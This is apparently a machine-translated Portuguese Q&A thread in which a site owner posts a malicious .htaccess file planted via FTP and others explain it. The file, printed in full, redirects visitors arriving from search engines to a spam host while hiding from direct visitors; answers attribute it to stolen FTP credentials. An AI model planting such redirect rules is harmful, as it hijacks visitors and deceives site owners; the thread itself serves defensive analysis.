Arquivo .htaccess suspeito

20

Este foi enviado para uma das minhas pastas de FTP. Não estou familiarizado com o Apache, mas ainda estou curioso - alguém pode me dizer que tipo de ação covarde esse arquivo está tentando cometer? Obrigado!

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2 security mod-rewrite .htaccess ovinófilo
fonte
11
LEGAIS! (Em um tipo maligno de forma ...) é basicamente tomando todos que chegam ao seu site a partir de um motor de busca e redirecionando-as para SPAMMER.info
KPWINC
Isso aconteceu comigo uma vez. O .htaccessarquivo adicionado ao meu site tinha cerca de 40 linhas em branco na parte superior, apenas para me confundir ainda mais.
TRiG

Respostas:

15

Isso envia os usuários provenientes de um mecanismo de pesquisa para o último site SPAMMER.info(consulte o histórico de perguntas do site real ).

Ele procura referenciadores na tentativa de se esconder de você , pois você provavelmente não acessa o site pelos mecanismos de pesquisa. Ou seja, se você for diretamente à URL, tudo parecerá normal. No entanto, se você entrar por um mecanismo de pesquisa, será redirecionado.

Nota: isso não afeta os rastreadores da Web, pois eles ( googlebot, pelo menos ) não definem o cabeçalho do referenciador.

Michael Haren
fonte
8

Sempre que um usuário de um mecanismo de pesquisa em qualquer página do seu site, ele será redirecionado para o site de spam .info.

É muito sorrateiro - você não notará que algo está errado, pois normalmente apenas digita o endereço.

Greg
fonte
11
Como ele está analisando o referenciador, ele não redirecionará nenhum clique que é fornecido por um mecanismo de pesquisa?
Não afeta os links do Google também? Por exemplo, você pesquisa o site do OP no Google, clica nele e é redirecionado desde que é do Google?
Sim, somente links de mecanismos de pesquisa (como eu disse na minha resposta), mas não rastreadores / bots de mecanismos de pesquisa. Esta resposta foi atualizada e agora está correta. Originalmente, isso indicava que isso se aplicava apenas aos bots.
267 Michael Haren
1

para adicionar mais - provavelmente suas credenciais de ftp vazaram. talvez você os tenha salvado no filezilla / commander total, etc. há muitos malwares que os roubam e depois 'circulam' - fazendo logon em contas ftp, anexando javascript malicioso ao index.php / html ou colocando arquivos reescritos semelhantes.

pQd
fonte
Estou enfrentando esse problema. Dia após outro arquivo .htaccess ser modificado, resultando em erro interno do servidor.
vnix27